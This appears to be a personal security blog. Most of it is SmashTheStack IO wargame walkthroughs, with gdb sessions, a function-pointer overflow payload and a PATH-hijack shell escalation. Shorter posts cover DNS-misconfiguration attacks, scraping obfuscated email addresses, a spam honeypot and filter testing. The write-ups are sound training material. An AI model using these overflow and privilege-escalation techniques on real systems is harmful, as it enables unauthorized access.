2010
05.03

Welcome to level 4. In my opinion, this one is easier than the previous levels if you know how the OS looks for executables. You are given both the executable and the source code again. When we first run the program, the following result is shown.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

Looks like it is running the command id.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm it by looking at the source code. And yes, it does have the statement

system("id");

which calls the Linux command.

If you are familiar with this command, you know it is just an executable, usually located in /bin/ or /usr/bin/. But why can you run it by just typing “id” instead of “/bin/id”? Because of an environment variable. On *nix systems it is PATH: the shell (and system(), which goes through the shell) searches each directory listed in PATH from left to right and runs the first match. You can use echo $PATH to see its current value.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level is:

  1. Create a piece of code or a script that calls “/bin/sh”
  2. Redirect the “id” command to run your script
  3. Execute the level4 executable

This works because the level4 executable runs with euid = level5 (see the definition of euid). If we bring up a shell from this executable, the shell gets level5 permissions automatically. Amazing enough?

You can only create code or scripts under /tmp/. We can do the following to create a script there.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo "/bin/sh" > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

Next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games
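To see why putting /tmp/onhacks first matters, the lookup the shell performs can be imitated in Python. This is only a sketch: the standard shutil.which function stands in for the shell's search, and a temporary directory plays the role of /tmp/onhacks. Both are illustrative assumptions, not part of the level.

```python
import os
import shutil
import tempfile


def resolve_command(name, path):
    """Return the first executable called `name` found in `path`, searching left to right."""
    return shutil.which(name, path=path)


def fake_id_wins():
    """Create a fake `id` in a temporary directory and check that it shadows the real one."""
    with tempfile.TemporaryDirectory() as fake_dir:  # stands in for /tmp/onhacks
        fake_id = os.path.join(fake_dir, "id")
        with open(fake_id, "w") as handle:
            handle.write("#!/bin/sh\n/bin/sh\n")
        os.chmod(fake_id, 0o755)  # same effect as chmod +x
        # Our directory comes first, like the modified PATH above.
        search_path = os.pathsep.join([fake_dir, "/usr/bin", "/bin"])
        return resolve_command("id", search_path) == fake_id


if __name__ == "__main__":
    print(fake_id_wins())
```

Because the search stops at the first match, whatever sits in the leftmost directory wins, which is all the trick needs.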

Now you are ready to gain access to the next level: run ./level4 again and it will start your script instead of the real id. Remember to grab the password for level 5. This level reminds us to make use of what we have learned; even a little trick can open a big hole. Think creatively and diversely.

See you in level 5.

Note:

  1. Other option: You can replace the script with a piece of C code which calls execl("/bin/sh", "sh", (char *)NULL);
  2. Your changes to the environment variable will not affect others; they are scoped to the current session.
2010
04.28

Hi all the heroes, you are now at level 3 and it is time to fight a little boss. This time, the monster blocking your way requires you to write some code (or a script) to finish it. Unlike the previous two levels, this time you have both the executable and the source code. As usual, first we execute the program without a parameter:

level3@io:~$ /levels/level03
Segmentation fault

Crap! I hate seeing a segmentation fault. How about giving it a parameter?

level3@io:~$ /levels/level03 nosegmentationfault
Address of hmm: 0x804847f

The executable gives us a hint that hmm is the key at this level. Let’s attach gdb and see what is inside the program.

(gdb) disass hmm
Dump of assembler code for function hmm:

0x080484a8 <hmm+41>:    call   0x8048340 <execl@plt>

I guess we are looking at the right place: hmm is a function which calls execl on “something”. By looking at the source code, we can confirm that this function is what we need. The remaining step to gain access is a stack buffer overflow. How can we achieve it? Going back to the source code, there is an interesting thing.

int (*fptr)(int) = good;

(*fptr)((int)hmmptr);

The program uses an unusual way to execute the function good: it calls it through the function pointer fptr. We can take advantage of this to call hmm() by overwriting the value stored in fptr. Can we do this? We need to look at what the stack looks like.

In this program, a variable that is declared later gets a smaller address, so fptr sits above buf on the stack. In other words, we can overwrite the value in fptr by copying more than 32 bytes into buf. Let’s go back to gdb and see where fptr is used for the call.

(gdb) disass main

0x0804859f <main+240>:  mov    eax,DWORD PTR [ebp-0x14]
0x080485a2 <main+243>:  call   eax

The function is called at 0x080485a2. What does the stack look like at that point?

(gdb) break *0x080485a2
Breakpoint 1 at 0x80485a2
(gdb) run $(perl -e 'print "B"x40';)
(gdb) x/20x $esp
0xbfffdcc0:     0x0804847f      0x00000000      0x00000030      0x00000000
0xbfffdcd0:     0x00000000      0x00000000      0xbfffde8d      0x0804847f
0xbfffdce0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdcf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdd00:     0x41414141      0x42424242      0x00000000      0x00000029

According to the dump above, fptr is located at 0xbfffdd00. In the memory dump, the first half of the variable has been replaced by four “A”s, but the last 4 bytes are what matter, because addresses are 4 bytes long on 32-bit machines. So what you need is a 40-character string that is copied into buf, with the last 4 bytes holding the address of hmm(). Keep in mind that the address is stored byte-reversed in memory, because x86 is Little-Endian: 0x0804847f is stored as the bytes 7f 84 04 08.

You can create the parameter like this:

./level3 `perl -e 'print "B"x36'; printf <Address of hmm() in Little-Endian representation>`
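If you prefer to let a script do the byte swapping, the argument can be built with Python's struct module. This is a minimal sketch, not the only way to do it; the 36 filler bytes and the address 0x0804847f are the values from the session above, and the function name is made up for illustration.

```python
import struct
import sys


def build_argument(padding_len, target_addr):
    """Return filler bytes followed by a 32-bit address in little-endian byte order."""
    return b"B" * padding_len + struct.pack("<I", target_addr)


if __name__ == "__main__":
    # 36 filler bytes plus the address of hmm printed by the program.
    sys.stdout.buffer.write(build_argument(36, 0x0804847F))
```

The "<I" format means an unsigned 32-bit integer in little-endian order, so the lowest byte of the address comes first in the output.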

Ready to go to level 4? See you then.

2010
04.26

How do you feel about breaking the program in level 1? Do you think that you can be a hacker? Sure you can. What you need is to get familiar with the tools (weapons) that you have, and always be evil. gdb is one of the great tools for investigation. But we usually don’t use it to discover vulnerabilities in software, because real software has thousands or millions of lines of code, which makes it unlikely that you can find a hole by eye, whether you are shortsighted or not. :P

Anyway, let’s move on to the next stage. After finishing the little thing at level 1, we have a bigger thing waiting at level 2 (not even a boss yet). When you first execute the program with no parameters, you will get this:

Append the 39th through 42nd numbers in the sequence as a string and feed it to this binary via argv[1]. 1, 2, 3, 5, 8, 13, 21…
The 4th through the 7th numbers would give you 581321

Easy enough? This time, you don’t really need to break the program; you just need to find what it wants and pass it as a string. Obviously, this is the Fibonacci sequence, and even the 45th number (1836311903) still fits within 2^31-1, so a 32-bit signed integer is enough. You can just write a simple program to generate the sequence and print the 39th through 42nd numbers. Or, if you don’t want to write a program, any spreadsheet software can calculate the sequence for you.
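A simple program for this could look like the sketch below. The function names are my own, and the numbering follows the hint from the binary (the 1st term is 1, the 2nd is 2). Python integers do not overflow, so the 2^31-1 limit only matters if you port this to a language with 32-bit integers.

```python
def sequence(count):
    """Return the first `count` terms of 1, 2, 3, 5, 8, 13, 21, ..."""
    terms = []
    a, b = 1, 2
    for _ in range(count):
        terms.append(a)
        a, b = b, a + b
    return terms


def joined(first, last):
    """Concatenate terms `first` through `last` (1-based, inclusive) as one string."""
    return "".join(str(term) for term in sequence(last)[first - 1:])


if __name__ == "__main__":
    print(joined(4, 7))    # the example from the program's hint
    print(joined(39, 42))  # the string the level asks for
```

Checking the 4th through 7th terms against the hint first is a cheap way to make sure the indexing is not off by one.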

Not much I can tell you this time. What you can learn here is to try tackling a problem in different ways, and to get familiar with what you have. See you in level 3!

2010
04.21

Let’s begin our wargame with SmashTheStack IO level 1. In my opinion, this game is good practice for getting familiar with gdb, the widely used debugger on *nix systems. Okay, so first of all, you need to ssh to io.smashthestack.org at port 2224 with this credential: level1@level1. This is the entry point as stated on this page: http://io.smashthestack.org:84/

The level 1 program is located at /levels/level01. When you first execute this program without any parameters, it prints its usage:

Usage: ./level01 <password>

If you type something like ./level01 password, result could be: Fail.

Let’s attach gdb and see what is interesting in its main function.

level1@io:/levels$ gdb ./level01
(gdb) disass main

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>
0x08048471 <main+125>:  test   %eax,%eax
0x08048473 <main+127>:  jne    0x804849f <main+171>

0x08048498 <main+164>:  call   0x80482ec <execl@plt>

0x080484be <main+202>:  ret

You will soon discover that this line

0x0804846c <main+120>:  call   0x804830c <strncmp@plt>

is the one we are interested in. A few lines after it there is an execl call, so it seems that the result of strncmp is used in an if statement. So we can set a breakpoint at 0x0804846c and see what is being compared.

(gdb) break *0x0804846c
(gdb) run password
(gdb) i r
eax            0x80485c8        134514120
ecx            0xbfffdebd       -1073750339

If you look at the value stored at the address held in each register, you will get the password which leads you to the next level: one of the registers points to the expected string that lets execution reach the execl statement, and the other points to your input. What you need to do is run the level 1 program again with the right input. Then you will have access to level 2 and can retrieve the password to log in as level2 by looking at /home/level2/.pass.

I am not going to tell you the actual input for level 1; you are just a step away from the goal after reading my logs above. Assuming you are new to gdb, what you can learn here is:

  1. How to attach a debugger (gdb) to a program?
    Ans. gdb <executable path> or gdb -q <executable path>
  2. How to disassemble a function in an executable?
    Ans. disass <function name>
  3. How to set a breakpoint in an executable?
    Ans. break *<instruction address>
  4. How to run a program in gdb with a parameter?
    Ans. run [<parameter>]
  5. How to dump the current values of registers?
    Ans. info registers (“i r” in short)
  6. How to look at the value of an address stored in a register?
    Ans. You need to figure this out. :)

I am moving on to next level, how about you?

Hope you enjoy playing this IO wargame.

2010
04.19

After disappearing for quite a long time, I am trying to write something again, which also proves that I am still alive. A few updates from my side:

  1. I just moved from Richmond, BC to Redmond, WA. Working with my team more closely.
  2. Helping my team to start up a new project for customers who want to rebrand our product as a service.
  3. Started playing wargames (in security).

Yes! I am playing the security wargames at SmashTheStack. The main goal is to use the program you can run at the current level to gain access to the next level; there is always a vulnerability in the program. There are several different games, depending on what vulnerabilities the programs have or how you are going to break them, e.g. IO, Logic, Blackbox.

I just started playing the IO game, where all the programs I have broken so far depend on the input you give. Usually, they have stack buffer overflow or heap buffer overflow issues.

Why am I presenting this post with the subject “SmashTheStack series”? Because I would like to present the solutions (or hints) for the levels that I have already solved. In the next few months, I will focus on breaking the programs there, until I have a bright idea for a security topic that I would like to work on or share. BTW, this game is good to play in your leisure time.

2009
12.08

This is more a report than a discovery in spam collection. I was working on setting up a spampot using spampot.py, which was written by Neale Pickett back in 2003. Although the result did not meet my expectations, it did give me more information about setting up a spampot.

Goal

The goal of running a spampot (a honeypot which only cares about spam) is to collect spam and analyze its trends; hopefully we can find some interesting techniques that spammers/hackers use in junk and phishing emails.

Approach
So far, I know of at least two ways to host a spampot. The names are my own; if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot runs as an open mail relay server. In case you are not familiar with the term, open relay means that anyone can send messages through the server anonymously.

Close Relay Spampot: The spampot runs as a closed mail relay server. To expose the server to spammers, you need to have your own domain bound to this server, with email address(es) exposed to spammers/hackers. For example, we can have onhacks.org bound to a spampot, with spam@onhacks.org as one of the email addresses we want to expose to spammers. However, methods to increase the exposure of an email address are out of scope here; we can discuss them later.

In my setup, I decided to run the spampot as an open mail relay server.

Setup
I have VirtualBox installed on top of Windows 7, with Ubuntu as the guest OS, because spampot.py seems to have been implemented for *nix systems. Since port 25 is the default port for the SMTP service, we need to forward packets from the host (Win7) to the guest (Ubuntu) so that the spampot in the guest OS can react to incoming connections on host port 25.

(Assuming that you are using NAT for VirtualBox)
To enable port forwarding, you need to set HostPort 25 to forward to GuestPort 25. For more detail on port forwarding in VirtualBox, please refer to the Tombuntu article in the references.

However, you will soon discover that port forwarding does not work if the port is reserved (< 1024). This can easily be resolved by running VirtualBox with admin credentials (i.e. Run As Administrator).

spampot.py requires Sendmail to be installed on Linux. Since sendmail is itself a service listening on port 25, I do the following to switch to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

You can of course set this up to run automatically when the system starts.

The last thing is to add a DNS record pointing to my machine. I have smtp.onhacks.org. pointing to it. Since this is still an experiment, the machine is running at home and its IP is dynamic, so I need to update the record often.

Result
So far, I have received 0 messages after running the spampot for a few days. I googled around, and it looks like open relay spampots are not that popular anymore: many server admins became aware that spammers were abusing open mail relay servers and no longer allow open relay. As a result, submitting spam to open relay servers is no longer efficient for spammers.

I will continue running the spampot for a while and see if we can get more spam through the open relay honeypot. Afterward, I will work on the close relay spampot.

Reference

  1. Open mail relay – Wikipedia
  2. spampot.py – written by Neale Pickett
  3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
  4. SpamPots Project – Cert.org
  5. Brazilian Honeypots Alliance
2009
11.29

Last night, I was woken by a call saying that a server was not working. This server hosts an online judging system (similar to uva.onlinejudge.org, which has algorithmic problems that users can solve). I took a quick look at the compilation process and web pages; everything looked good except that it always returned “Compilation Error” no matter what the source code contained (even a HelloWorld!). When I compiled the source code manually, the error message gave more detail about the root cause... Not enough space to link the object files! When I ran “df”, it said that the data partition was 100% used!!

After a deeper investigation, I discovered that one of the users was preparing questions on the machine and had unexpectedly generated 12GB of test data. Since this is a very old machine, it only has a 14GB hard disk for data storage, and it already had 2GB of data on it. This is a kind of DoS attack, since no one can submit sources to the judging system even though they can navigate to it.

Lesson learned: We should restrict the storage usage of each user instead of leaving it unlimited.
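One lightweight way to act on this lesson is a periodic check of how much each user's directory holds. The sketch below is only an illustration with made-up function names; on a real server, filesystem quotas enforced by the OS would be the more robust choice, since a script like this only detects the problem after the fact.

```python
import os


def directory_size(root):
    """Return the total size in bytes of all regular files under `root`."""
    total = 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            if not os.path.islink(path):  # do not count symlink targets
                total += os.path.getsize(path)
    return total


def over_quota(root, limit_bytes):
    """Return True when the files under `root` use more than `limit_bytes`."""
    return directory_size(root) > limit_bytes
```

A cron job could call over_quota on each home directory and warn the user (or the admin) long before the partition reaches 100%.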

Any other suggestions to prevent this from happening again?

2009
09.12

I disappeared again after my last post about spam collection and DNS misconfiguration. Today, I read log0's post in which he is calling for bots/tools for his security research. Did you see anything familiar? Look at how log0 shows his contact to us: “log0 [ at ] gmail [ dot ] com”. We have been using this format for quite some time, ever since we realized that showing the full form of our address (e.g. spam@onhacks.org) increases the chance that our email gets exposed to spammers.

However, these kinds of representation have been appearing on the Internet for the last few years. Did you ever think of this fact: clever spammers just need to modify a few lines of code in their bots, changing the target strings they look for, and then everything works the same as in the past.

The most interesting thing is that RSnake blogged about his findings on this form of email representation last Tuesday. In short, he googled “at gmail dot com”, and surprisingly there were at least 6 email addresses on the first result page. There are many variations, but they all follow the same pattern. Here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am trying my best to let spammers know my address)

I spent an hour writing a very simple PoC parser to retrieve email addresses from the result page mentioned above. There are at least 4 valid email addresses on that page, so it is not too hard for bots to harvest them. The parser just looks for one ‘at’ and one ‘dot’ keyword appearing sequentially in the pattern: [any word] “at” [any word] “dot” [any word]. The code is poorly written; I will improve it later this week.
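The original PoC is not reproduced here, but the idea fits in a few lines of Python. The sketch below is a fresh illustration of the same pattern, not the parser I actually ran; the regular expression and function names are assumptions, and it only handles single-label domains such as “onhacks dot com”.

```python
import re


def _separator(keyword):
    """Match the keyword either bracketed/quoted ([at], (at), <at>, "at") or surrounded by spaces."""
    return r'(?:\s*[\[(<{"“]\s*' + keyword + r'\s*[\])>}"”]\s*|\s+' + keyword + r'\s+)'


OBFUSCATED_EMAIL = re.compile(
    r'([A-Za-z0-9._+-]+)' + _separator('at') +
    r'([A-Za-z0-9-]+)' + _separator('dot') +
    r'([A-Za-z]{2,})',
    re.IGNORECASE,
)


def extract_addresses(text):
    """Return every obfuscated address found in `text`, rewritten as user@domain.tld."""
    return [f"{user}@{domain}.{tld}" for user, domain, tld in OBFUSCATED_EMAIL.findall(text)]


if __name__ == "__main__":
    print(extract_addresses("contact: log0 [ at ] gmail [ dot ] com"))
```

Requiring whitespace or a bracket around each keyword keeps words that merely end in “at” (such as “combat”) from matching, although ordinary sentences like “meet me at home dot com” would still produce false positives.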

It is not difficult to discover the pattern in these email addresses; it is a piece of cake even for primary school students. Then what kind of representation should we use to show our email address on the Internet? Display a JPEG of the email address? Without noise added to the image, recovering it is as easy as performing text recognition. With noise in the image, it is more like a CAPTCHA. Since most CAPTCHA solvers target a specific type of CAPTCHA, it may take more time to decode an email address “encrypted” as a CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not to show your address on the web! Or encode it as a CAPTCHA, so that at least your email address has less chance of being captured by spammers.

2009
08.08

It has been a long time since my last post. I disappeared because the project I am working on is going to ship soon, and I have been busy finding bugs and fixing test cases these past few months.

Anyway, let’s get back to a security discussion today. I was playing around with testing the DNS resolver feature in my product; DNS is always a great place to play. While I was looking for interesting scenarios to test the feature, I found this article. Although it is old news, the problem is still in the wild.

DNS Misconfiguration

Many administrators like to install “localhost. IN A 127.0.0.1” as a record in their DNS server. However, administrators often mistakenly drop the trailing dot (i.e. “localhost IN A 127.0.0.1”). Since they put this record into a DNS zone (e.g. yahoo.com), and a name without a trailing dot is treated as relative to the zone, the record actually becomes “localhost.yahoo.com. IN A 127.0.0.1”! In other words, when you nslookup “localhost.yahoo.com”, it gives you 127.0.0.1!
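The effect of the missing dot is easy to reproduce with a few lines of Python. This is a simplified sketch of how owner names in a zone file are expanded (the function name is made up, and real zone-file parsing has more rules than this):

```python
def qualify(owner, origin):
    """Expand a zone-file owner name into a fully qualified domain name."""
    if not origin.endswith("."):
        origin += "."
    if owner == "@":           # "@" is shorthand for the zone origin itself
        return origin
    if owner.endswith("."):    # a trailing dot marks the name as already absolute
        return owner
    return owner + "." + origin  # relative names get the origin appended


if __name__ == "__main__":
    print(qualify("localhost.", "yahoo.com."))
    print(qualify("localhost", "yahoo.com."))
```

With the dot, the name stays “localhost.”; without it, the zone name is appended and the record silently becomes part of the public zone.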

I found that there are still many such misconfigurations in the wild. Here are some examples:

localhost.fbi.gov gives IP address 127.0.0.1
localhost.domain.ca gives IP address 127.0.0.1
localhost.gov.za gives IP address 127.0.0.1
localhost.cancer.gov gives IP address 127.0.0.1

Application

Same-Site Scripting attack

Attackers can easily take advantage of these misconfigured DNS records on a multi-user system. Consider two users, log0 and .hac, on a *nix system. .hac can write a program that binds to a port (e.g. 1024) on the system. Afterward, .hac sends an email to log0, pretending to show some interesting stuff from fbi.gov, for example an image with unknown symbols (i.e. an <img> tag in the mail, <img src="http://localhost.fbi.gov:1024/symbols.jpeg" />). Imagine what happens when log0 reads the message. Yes! The browser resolves localhost.fbi.gov, which points to 127.0.0.1, and connects to 127.0.0.1:1024 to grab the image. Wow, the program can now grab log0's credentials by looking at the HTTP request. This is called a same-site scripting attack, as already mentioned in the article.

Possible (D)DoS attack

A same-site scripting attack is against a client; there is another possible attack against the server. Consider a mail system (e.g. gmail.com) that accepts messages submitted by its users to anyone in the wild. The system does not know which host it should connect to in order to deliver a message until it resolves the address of the recipient domain. What happens if we submit a message with the recipient none@localhost.gov.za (localhost.gov.za points to 127.0.0.1)? The mail flow is as follows:

  1. Message submitted: MAIL FROM: evil@gmail.com, RCPT TO: none@localhost.gov.za
  2. Gmail receives it and resolves the address of localhost.gov.za (localhost.gov.za. IN A 127.0.0.1 as the response)
  3. Depending on the implementation, it may:
    go back to Step 1, which means the message is resubmitted to the same server;
    go back to Step 2, where the server rejects the message, marks it as failed and retries later;
    otherwise, detect the loopback address and drop the message due to security concerns.
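The third option in step 3 can be sketched as a small routing check. This is only an illustration under simplifying assumptions: the function name is made up, the resolver is passed in as a plain function, and a real mail server would look up MX records rather than a single address.

```python
import ipaddress


def delivery_action(recipient, resolve):
    """Return "drop" when the recipient's domain resolves to a loopback address, else "deliver"."""
    domain = recipient.rsplit("@", 1)[1]
    address = ipaddress.ip_address(resolve(domain))
    return "drop" if address.is_loopback else "deliver"


if __name__ == "__main__":
    # Stand-in for DNS; 192.0.2.10 is a documentation-only address used as a placeholder.
    fake_dns = {"localhost.gov.za": "127.0.0.1", "example.org": "192.0.2.10"}
    print(delivery_action("none@localhost.gov.za", fake_dns.get))
```

Checking the resolved address before queuing the message is what keeps the server from delivering to itself over and over.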

The security concern is a DoS attack: if the system goes back to step 1 or 2, the message gets stuck in the mail system. Attackers can submit thousands or millions of such messages to increase the workload of the mail system until it results in a DoS. I mentioned that it may be a DDoS because the mail system may have a mechanism to limit the number of submissions per user per hour, so the attacker needs multiple mailboxes to achieve the goal.

I have tested some well-known email systems: Gmail, Hotmail and Exchange 2010. Here are some brief observations:

Gmail: Accepts the first submission of a message whose recipient resolves to a loopback address. However, it refuses to accept a message from the same origin, which means resubmitting the message is not allowed. The system marks the message as failed and attempts to retry it within 3 days.

Hotmail: Similar to Gmail, but it only retries within 2 days.

Exchange 2010: If the recipient resolves to a loopback address, the server drops the message and returns an NDR citing a security concern as the reason.

It is obvious that this kind of DNS misconfiguration enables attacks against both clients and servers. I believe there are more interesting uses of DNS records pointing to 127.0.0.1. Let me know if you have any interesting scenarios.

Remember: localhost. IN A 127.0.0.1 (if you are not doing evil things. ;) )


2009
05.31

Testing something is always good practice before learning how to hack it, and the methodologies we use in testing are sometimes applicable to hacking. So, I am planning to write some entries related to testing in the coming months, to see if we can discover a systematic way to hack. Here is the first challenge; it is very simple.

Problem
Network managers always want to, or are forced to, control the information flowing around a network. Most of the time, filtering is a good way to do so. Within this big category, block lists are a popular way to prevent information from coming into or going out of the network.

Scenarios
Flora doesn’t want her daughter to wallow in Japanese pop stars. Flora knows that her daughter always navigates to sites with domain names ending in ‘.jp’, so she is looking for a tool that can control what kinds of websites their PC can reach.

The IT administrator at PC middle school discovered that the school's mail system has started receiving porn advertisements and that students are sharing these links through the mail system. The school is planning to deploy a filter that can block all such mail flows.

Justin loves blogging so much that he writes weekly. He loves to collect and read feedback from his audience. However, he hates spammers pasting unrelated advertisements on his posts. He wants to figure out a way to stop them from appearing to other readers.

Solution
The trivial filtering solution to help these people out is bad word filtering. The basic idea is the same as a general block list: users specify the tokens to look for when deciding whether to block the information. In general, there are at least two different definitions of when a bad word has been found. Given an input message M,

  1. Split the message M into a sequence of words Ws; a bad word bW is found in the message only if Ws contains bW.
  2. Take the message M as an input stream; a bad word bW is found when some run of consecutive characters equals bW.
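The difference between the two definitions is easiest to see in code. The sketch below is one possible reading of them, with made-up function names; it assumes the bad words are given in lowercase and that a “word” is a run of letters, digits or underscores.

```python
import re


def found_by_words(message, bad_words):
    """Definition 1: a bad word must equal a whole word of the message."""
    words = re.findall(r"\w+", message.lower())
    return any(word in bad_words for word in words)


def found_by_stream(message, bad_words):
    """Definition 2: a bad word may appear anywhere in the character stream."""
    text = message.lower()
    return any(bad in text for bad in bad_words)


if __name__ == "__main__":
    bad = {"evil"}
    print(found_by_words("visit residentevil.com", bad))
    print(found_by_stream("visit residentevil.com", bad))
```

The first definition misses bad words glued to other text, while the second also fires on innocent words that happen to contain a bad word.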

Both definitions have their own advantages and disadvantages, but we will leave that discussion for later, since the current topic is how to test the filter. Let’s say we pick the first definition for our filter; then what should we test? (Take some time to think about scenarios before you continue reading.)

Functional Test
Based on the input of this filter (the input message M), we can design a few functional test cases. Basic scenarios are:

  • empty message [Expected: Accept];
  • only one word (either good or bad) [Expected: good - Accept, bad - Reject];
  • two words (good and bad) with different delimiters [Expected: Depends on how the feature defines a delimiter];
  • a list of words containing (0, 1, 2, all) bad words [Expected: 0 - Accept, otherwise Reject];
  • a bad word embedded in another word (e.g. assume evil is a bad word and the message contains residentevil.com) [Expected: By design, this message will be accepted]
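These scenarios translate naturally into a table of inputs and expected verdicts. The sketch below is a hypothetical harness, not a real product's test suite: the block list, the verdict function and the choice of whitespace as the only delimiter are all assumptions made for illustration.

```python
BAD_WORDS = {"evil", "bad"}  # hypothetical block list


def verdict(message, bad_words=BAD_WORDS):
    """Toy filter under test: split on whitespace and reject if any token is a bad word."""
    tokens = message.lower().split()
    return "Reject" if any(token in bad_words for token in tokens) else "Accept"


# (message, expected verdict), one row per scenario in the list above
CASES = [
    ("", "Accept"),                        # empty message
    ("hello", "Accept"),                   # one good word
    ("evil", "Reject"),                    # one bad word
    ("good evil", "Reject"),               # two words, space delimiter
    ("good,evil", "Accept"),               # comma is not a delimiter in this sketch
    ("a b c", "Accept"),                   # list with 0 bad words
    ("a evil c", "Reject"),                # list with 1 bad word
    ("evil a bad", "Reject"),              # list with 2 bad words
    ("evil bad", "Reject"),                # all words are bad
    ("visit residentevil.com", "Accept"),  # bad word embedded in another word
]


def failures():
    """Return the rows where the filter disagrees with the expected verdict."""
    return [(msg, want, verdict(msg)) for msg, want in CASES if verdict(msg) != want]


if __name__ == "__main__":
    print(failures())
```

Keeping the cases in a table makes it cheap to add a row whenever a new scenario comes to mind, such as another delimiter.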

Besides these functional test cases, we should have lengthy messages to check the boundary cases of the feature. Assuming the longest message we accept is N characters, we need messages with length N, N+1 and N+2. In addition, globalization and localization tests may be required, depending on who your target users are.

Security Concern
Then we would ask: is there any other way to bypass the filter (e.g. a message using a different encoding)? Is a code injection or script injection attack possible? Who can use the feature? Where is the bad word list? Who has the right to touch the list? These are security concerns when testing the feature. Drawing a data flow diagram always helps to identify what kinds of security issues we may have. However, this post only focuses on functional testing of a feature. Maybe next time we can discuss how to design security test cases for a feature.

Conclusion
We have only discussed some elementary skills for designing the test plan of a feature. You can consider what kinds of input the feature can take, both valid and invalid. Output is another way to discover new scenarios; output is anything that the feature shows. Since we assumed that this filter only accepts or rejects a message and throws some exceptions (e.g. input size exceeded), the test cases we found here are almost entirely determined by the input. Now you are able to test your program more systematically!

Have a good weekend!

Practice (Just for fun)
Should you want some practice, we can discuss how to test an IP block list filter. Here is a simple definition:

INPUT: Only IPv4 addresses are allowed, one at a time
IMPLEMENTATION: The IP block list is stored as a text file in the same folder as the filter; the user needs to modify the text file directly to Add/Remove/Edit an IP address in the block list. The filter performs a binary search to see if the input address is on the list. If it is, it outputs reject; otherwise it outputs accept.
OUTPUT: Accept/Reject the address
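To have something concrete to test against, here is a minimal sketch of such a filter. It is one possible implementation of the definition above, not a reference one; the function names are made up, and the list is passed in as lines of text rather than read from a file.

```python
import bisect
import ipaddress


def load_block_list(lines):
    """Parse one IPv4 address per line and return them as a sorted list of integers."""
    entries = {int(ipaddress.IPv4Address(line.strip())) for line in lines if line.strip()}
    return sorted(entries)


def check(address, block_list):
    """Binary-search the sorted block list; raises ValueError for non-IPv4 input."""
    key = int(ipaddress.IPv4Address(address))
    index = bisect.bisect_left(block_list, key)
    blocked = index < len(block_list) and block_list[index] == key
    return "Reject" if blocked else "Accept"


if __name__ == "__main__":
    blocked = load_block_list(["10.0.0.2", "9.0.0.1", "", "192.168.1.1"])
    print(check("9.0.0.1", blocked))
```

Note that this sketch sorts the addresses numerically after loading. An implementation that trusts the order of the text file, or sorts the addresses as strings (where “10.0.0.2” comes before “9.0.0.1”), gives the binary search a wrongly ordered list, which is exactly the kind of scenario worth a test case.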